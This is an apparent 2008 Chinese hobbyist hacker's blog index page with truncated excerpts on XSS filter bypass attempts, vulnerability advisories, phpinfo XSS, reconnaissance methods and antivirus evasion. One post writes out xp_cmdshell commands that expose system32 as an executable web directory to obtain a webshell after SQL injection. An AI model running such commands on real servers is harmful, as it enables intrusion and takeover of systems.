*
百度首页 | 百度空间
 
文章列表
 
2008年07月19日 星期六 01:11

这个倒有点意思。可以说突破防XSS思路吧。但是假如成功,然倒就一定可以进。

我自认为我XSS目前没一次成功的。可能我对XSS还不够深入吧

今天有朋友和我讨论了一下关于百度富文本编辑器 XSS Filter的问题,关于过滤规则可以看我之前在WoBB终章里总结的8条规则。

这里我可以把我测试XSS Filter的部分html发一下,希望能帮助到某些朋友。(当然我最终还是没绕过去)

如下:

<img src=

 
2008年07月19日 星期六 01:07

来源:知道安全

发布日期:2008-7-18

最后更新日期:2008-7-18 15:57(GMT)

受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.

测试方法:

以下代码可能包含恶意行为,请

 
2008年07月19日 星期六 01:01
描述:
BUGTRAQ ID: 29797
CVE(CAN) ID: CVE-2008-2665

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP 5的posix_access()函数在处理用户数据时存在漏洞,远程攻击者可能利用此漏洞
 
2008年06月30日 星期一 03:18
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec mast
 
2008年06月30日 星期一 02:51

说实在的PHP我并不怎么样,可以说是初学者吧

慢慢学习

说明:


php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数,许多站点和程序都会将-phpinfo放在自己的站点上或者在程序里显示,但是phpinfo里存在一些安全问题,导致精心构造数据就可以产生一个跨站脚本漏洞,可以被用来进行攻击。



漏洞成因:


phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定

 
2008年06月30日 星期一 02:50

最近帮朋友维护服务器和帮他的网站程序添加点防注入或是跨站漏洞之类的安全

所以没什么及时更新博客,最近还在为找暑假工烦恼呢

英雄末路啊//

(1)char、varchar、text和nchar、nvarchar、ntext
char和varchar的长度都在1到8000之间,它们的区别在于:
char:是定长字符数据,,速度快。
varchar:是变长字符数据,节省储存空间,但是存取速度慢。
所谓定长就是长度固定的,当输入的数据长度没有达到指定的长度时将自动以英文空格在其后面填充,使长度达到相应的长度;

 
2008年06月28日 星期六 03:24

有了前一篇,发现也有不足的地方,在帖一篇

入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。
一,踩点
踩点可以了解目标主机和网络的一些基本的安全信息,主要有;
1,管理员联系信息,电话号,传真号;
2,IP地址范围;
3,DNS服务器;
4,邮件服务器。
相关搜索方法:
1,搜索网页。
确定目标信息1,为以后发动字典和木马入侵做准备;寻找网页源代码找注释和
隐藏域,寻找隐藏域中的"FORM"标记。例如:
<FORM action=/

 
2008年06月28日 星期六 03:22

ZWELL大哥的,很好的一个人,华为高级工程师....是我佩服人之一

贴这个主要也是为给那刚接触这一'伟大'事业的人对这事业的了解

目录Author : ZwelL
零、前言

 
2008年06月23日 星期一 18:19

每天的疲劳让我的身体再 也不没办法承受

虚弱的身体.疲惫的心

我需要休憩

于是我回到家里.我放弃了赚那几百块钱.

我也得回家

家还是那么清爽..天空还是那么美

感受不到城市社会所带的肮脏空气

也没有那所谓的勾心斗角

网络虚拟.我结交了很多办法

但是也让我 失去了很多

我有很多次想离开网络

但是我好象除了在网络上的那点小本事

没有其他的了

所以我得呆在网络里继续的我的旅游

回家的感觉真好,我可以几天不跟网络打交道

 
2008年06月08日 星期日 23:25

是位叫xyzreg大牛是2005年写玩意

太可怕了

听说可以过卡巴还有东方微点等一系列杀毒软件

俺跟他没办法比

可惜是不公布,如果谁手上有的话

那他奶奶的也不用那么免费去做什么免杀了

我不知道什么时候可以写出来。。。太打击我了。

以前还自以为自己的小本事可以独挡一面,

现在看来,还少着呢(至

 
     
 
 
个人档案
 
ymhacker
男, 20岁
福建 福州 
上次登录:
1天前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
     
 
最新评论
   
文章评论|照片评论


网络就是一切
拥有网络 别无所求..
无法理解
哈哈
 
 
 

因为我喜欢黑,
我早是在黑夜中最有精神
 
 
     
 
最近访客
 
 

俺的坦克

anuiz

微点

hkxa

blueset

心香夜无眠

Hac_Ker

iajevfhp
     
 
背景音乐
 
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2008 Baidu